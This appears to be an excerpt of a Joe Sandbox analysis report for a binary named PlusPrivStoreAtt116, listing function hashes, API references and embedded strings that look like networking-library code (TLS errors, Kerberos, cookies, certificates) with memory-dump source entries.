                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_BINDINGS
                                        • API String ID: 600764987-2710416593
                                        • Opcode ID: ad520cff00791436f665a9c7ebc751bfe0d4d410ed940af3941ef55134a63b2e
                                        • Instruction ID: bcfe4b187725de37be164405fe95d99c518dfeba6cd27c90aacf7041031a1121
                                        • Opcode Fuzzy Hash: ad520cff00791436f665a9c7ebc751bfe0d4d410ed940af3941ef55134a63b2e
                                        • Instruction Fuzzy Hash: A0317022A0D7C185EB629F21E5543BA7BA0FF85748F50053ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_UNKNOWN
                                        • API String ID: 600764987-1381340633
                                        • Opcode ID: 942faa6bf7be1711fa1d0b7566088d42f301b9f5789a6e1556235a281404a159
                                        • Instruction ID: 7a1092c44b7a5733a06a52b07850537de76d2a63bd1be9bf75f81b36944cb1db
                                        • Opcode Fuzzy Hash: 942faa6bf7be1711fa1d0b7566088d42f301b9f5789a6e1556235a281404a159
                                        • Instruction Fuzzy Hash: 06317022A0D7C185EB629F21E5543BA7BA0FF89748F50053ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_PACK
                                        • API String ID: 600764987-1502336670
                                        • Opcode ID: 1995ff10ed04dce21260e3a967019fbcd735387925a1af334264184213179178
                                        • Instruction ID: 363bbabab523efddc08db2b5b90b38852bb86dfc7480d0d64af5387137d4f24d
                                        • Opcode Fuzzy Hash: 1995ff10ed04dce21260e3a967019fbcd735387925a1af334264184213179178
                                        • Instruction Fuzzy Hash: 0C317022A0D7C185EB629F21E5543BA7BA0FF89748F50053ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_INSTALL
                                        • API String ID: 600764987-2628789574
                                        • Opcode ID: 089ccadd014c3ee78b622b01899f77aba2584c1a400cd428feca2a335efb15ad
                                        • Instruction ID: 6a524c7bbb45919c33f1b5e592e71096e6b141a7cd4a9d781775bfbea25a62f3
                                        • Opcode Fuzzy Hash: 089ccadd014c3ee78b622b01899f77aba2584c1a400cd428feca2a335efb15ad
                                        • Instruction Fuzzy Hash: 10317022A0D7C185EB629F21E5543BA7BA0FF89748F50053ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_EXPIRED
                                        • API String ID: 600764987-3862749013
                                        • Opcode ID: 56e2ddeb5580827647768440bcc176f8b6946ce4dee5d87353e15cb9a0a16672
                                        • Instruction ID: 77669eebe88d7326546f921230b3f9505f18224874cccecab3d68276e4ba3a02
                                        • Opcode Fuzzy Hash: 56e2ddeb5580827647768440bcc176f8b6946ce4dee5d87353e15cb9a0a16672
                                        • Instruction Fuzzy Hash: AB319022A0D7C185EB629F21E5543BA7BA0FF89748F50043ADE8D82A96DF7CD544CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$FormatMessagestrchrstrncpy
                                        • String ID: %s (0x%08X)$%s - %s$SEC_E_ALGORITHM_MISMATCH
                                        • API String ID: 600764987-618797061
                                        • Opcode ID: f5330ccc4088d604f1c4fdc059b1ac81f642d8961113e143d29ca4ea7cab1393
                                        • Instruction ID: f05351bd289765f83848066cd901056d4519c7c4b070b4d2ae0296292d30b375
                                        • Opcode Fuzzy Hash: f5330ccc4088d604f1c4fdc059b1ac81f642d8961113e143d29ca4ea7cab1393
                                        • Instruction Fuzzy Hash: 0A318F22A0DBC285EB629F31E5543AA7BA0FF85748F50053ADE8D82A96DF7CD544C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_time64
                                        • String ID:
                                        • API String ID: 3087401894-0
                                        • Opcode ID: 794ec81e754e4059ed5435738d62d671d13dfc205665a64c9ad2aac622e1363a
                                        • Instruction ID: 0969e21382c4509adbf805240116876286342b2dea0e035dc7209f61e1db2912
                                        • Opcode Fuzzy Hash: 794ec81e754e4059ed5435738d62d671d13dfc205665a64c9ad2aac622e1363a
                                        • Instruction Fuzzy Hash: 17212F36A09A4281EB25DF22E96422E6B70FF58F98F284431DE9E83755DFBCD485C340
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: invalid number; expected '+', '-', or digit after exponent$invalid number; expected digit after '.'
                                        • API String ID: 0-808606891
                                        • Opcode ID: dc9dd6f78c51c9d00d5e7a5a116f0ea754b32ee68f05b370b316dc6568bbd5a6
                                        • Instruction ID: fe60aea52afea9acdcb4531821706e57a769e4d3a61df8e90aa277888f990bc9
                                        • Opcode Fuzzy Hash: dc9dd6f78c51c9d00d5e7a5a116f0ea754b32ee68f05b370b316dc6568bbd5a6
                                        • Instruction Fuzzy Hash: 4CB18B62D08B8185E7248F69D4852BCBB61FF15B5CF744536CA4E822DADFBCE885C390
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029FEC1A
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029FEC68
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029FECCB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029FEE09
                                          • Part of subcall function 00007FF6029F2BB0: strchr.VCRUNTIME140(00000000,?,?,00007FF6029F216F), ref: 00007FF6029F2BF6
                                          • Part of subcall function 00007FF6029F2BB0: strchr.VCRUNTIME140(00000000,?,?,00007FF6029F216F), ref: 00007FF6029F2C06
                                          • Part of subcall function 00007FF6029F2BB0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,00007FF6029F216F), ref: 00007FF6029F2C30
                                          • Part of subcall function 00007FF6029F2BB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029F2C65
                                          • Part of subcall function 00007FF6029F2BB0: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029F2C8A
                                          • Part of subcall function 00007FF6029F2BB0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029F2CAC
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029FEE94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$callocmallocstrchr$freestrncpy
                                        • String ID: GSSAPI$GSSAPI handshake failure (empty challenge message)$Kerberos
                                        • API String ID: 370574955-353107822
                                        • Opcode ID: 62b95cc9be84fab37b278ae00dd924208aa487661d2fb2e3ed9602513512a5c0
                                        • Instruction ID: 5f74730d6b02a5730e9c6c2ffff239d957d86df985a2155633267c36dfd1a9e4
                                        • Opcode Fuzzy Hash: 62b95cc9be84fab37b278ae00dd924208aa487661d2fb2e3ed9602513512a5c0
                                        • Instruction Fuzzy Hash: 9CA15032A09B458AEB918F66E4402AE3BB5FF44B9CF200035EE8D97769DF78D445C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup
                                        • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced
                                        • API String ID: 1169197092-2292467869
                                        • Opcode ID: 2d088661407471c340e037e5bc677ccb42780f4bb53e5a0b769a2f71de486dc2
                                        • Instruction ID: a1914e80744aea64238f5f4929002b941c8015282d664dec1ce3c85127517fca
                                        • Opcode Fuzzy Hash: 2d088661407471c340e037e5bc677ccb42780f4bb53e5a0b769a2f71de486dc2
                                        • Instruction Fuzzy Hash: 69914021A1C78685FFB68B1796543B96FE4AF45748F240035DB8E82792DEACE484CB10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup
                                        • String ID: %s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$__Host-$__Secure-
                                        • API String ID: 1169197092-978722393
                                        • Opcode ID: 5bdc410ad30d77e21f242e2b6b91bd660e22e76722d123371d2d807fa3d66e4f
                                        • Instruction ID: 6517dac76345415a9b00e4c850182dedae8443ddc0ce834002db79b521dac93e
                                        • Opcode Fuzzy Hash: 5bdc410ad30d77e21f242e2b6b91bd660e22e76722d123371d2d807fa3d66e4f
                                        • Instruction Fuzzy Hash: 55714F21A1C78685FFB68B17D6443796FA4AF4575CF244036DB8D82693DFACE484C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$strchrstrtol
                                        • String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d$anonymous
                                        • API String ID: 137861075-1224060940
                                        • Opcode ID: e19e7a17892ef0fd4547017b0856966097517799dc59ca407be5fc436240d304
                                        • Instruction ID: 4d0de77765ef3f61eff3c03aa7e086f57d7a32e772f5ee932658ed972e5f8f0f
                                        • Opcode Fuzzy Hash: e19e7a17892ef0fd4547017b0856966097517799dc59ca407be5fc436240d304
                                        • Instruction Fuzzy Hash: 7F51BF22A08B9284EB319F12A8503AA6B90FF45FACF745535DE8D87696CFBCD641C700
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:
                                        • API String ID: 1294909896-1147549499
                                        • Opcode ID: 385dc882819c52ca158ae66e1c8fc50eeaa61ac4709d9a297e49cd8d193e9647
                                        • Instruction ID: 8fce17ed5898bf484c561b10975f8e44fcec428d9b8c7716016c7c670df79a06
                                        • Opcode Fuzzy Hash: 385dc882819c52ca158ae66e1c8fc50eeaa61ac4709d9a297e49cd8d193e9647
                                        • Instruction Fuzzy Hash: 2F41B621F0C64341FA25AB1396612B96A95AF45BC8F745431DE0EC7BC7DFADE401A344
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$callocfreestrrchr
                                        • String ID: Wildcard - Parsing started
                                        • API String ID: 2641349667-2274641867
                                        • Opcode ID: d3206ece8c049ce406ef9530f267500809fa406ac983cff5e528a3274c83daa2
                                        • Instruction ID: 8bf88204823b269f21dd5b36135aa9d778c1f4134a5b307905454ac1f415a28a
                                        • Opcode Fuzzy Hash: d3206ece8c049ce406ef9530f267500809fa406ac983cff5e528a3274c83daa2
                                        • Instruction Fuzzy Hash: 16517E36A08B42C1EB55DF16E8501B93BA9FF94B48F654435CA4D8B396EFB8E455C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdup
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$FALSE$Serial Number$Signature Algorithm
                                        • API String ID: 2653869212-3672398475
                                        • Opcode ID: b407aa12ab9d603bb7481d1789e94b5a93f7aa65e4bcc9714295407214bc55c9
                                        • Instruction ID: a4de97a1da5216c552160381bb1558cc55dafd63af070e692ecfc9bdc691b24c
                                        • Opcode Fuzzy Hash: b407aa12ab9d603bb7481d1789e94b5a93f7aa65e4bcc9714295407214bc55c9
                                        • Instruction Fuzzy Hash: EA41A3A1F4878288EBA18B6694442FA6F65BF05B8CF680435DE4E9775BDFBCE154C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: mallocmemcpy
                                        • String ID: %%25%s]$%ld$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                                        • API String ID: 4276657696-1832275178
                                        • Opcode ID: fd768c2aa5eae75a5a2e6dc2aa22c2356e80d146e042891e7013a1ccd583ede0
                                        • Instruction ID: 0f12cc3b6a0d9b15440156fd9297b11c023b6dd828744cd554f9db605e1939ab
                                        • Opcode Fuzzy Hash: fd768c2aa5eae75a5a2e6dc2aa22c2356e80d146e042891e7013a1ccd583ede0
                                        • Instruction Fuzzy Hash: 3DA15E72A09B8685EF658F12A5403B97BA4FF44B88F244136CE4D83B9AEF7CE444C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                        • API String ID: 3401966785-2901970132
                                        • Opcode ID: d77bbf88a504c9176559139c5e71d2011c5d623afa97ab2ba937b66deb4465e9
                                        • Instruction ID: 94b631431a138a262661e8cc82edfad40765b9b5fd6e44776e9ddcdcef0a079b
                                        • Opcode Fuzzy Hash: d77bbf88a504c9176559139c5e71d2011c5d623afa97ab2ba937b66deb4465e9
                                        • Instruction Fuzzy Hash: C961E561A4878249EBD9872284142FA2FA1FF05B9CF244535EE5F8B7D6EEBCE145C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                        • API String ID: 3401966785-517259162
                                        • Opcode ID: 5b4011869b0755b7bd384421eda15a8f17f7ed763e6d0546f24f4cd3c10d53e7
                                        • Instruction ID: 0ed92f9b29009a5bdd4bed0e71a2729362026430792eec994b96327d1561c1b3
                                        • Opcode Fuzzy Hash: 5b4011869b0755b7bd384421eda15a8f17f7ed763e6d0546f24f4cd3c10d53e7
                                        • Instruction Fuzzy Hash: 12610351E4878245EBD887A284542FA6F91AF05B8CF284535EA0F8B78BEEACE145C300
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,NTLM,?,00007FF6029D4DF8), ref: 00007FF6029F1920
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,NTLM,?,00007FF6029D4DF8), ref: 00007FF6029F1957
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,NTLM,?,00007FF6029D4DF8), ref: 00007FF6029F197E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
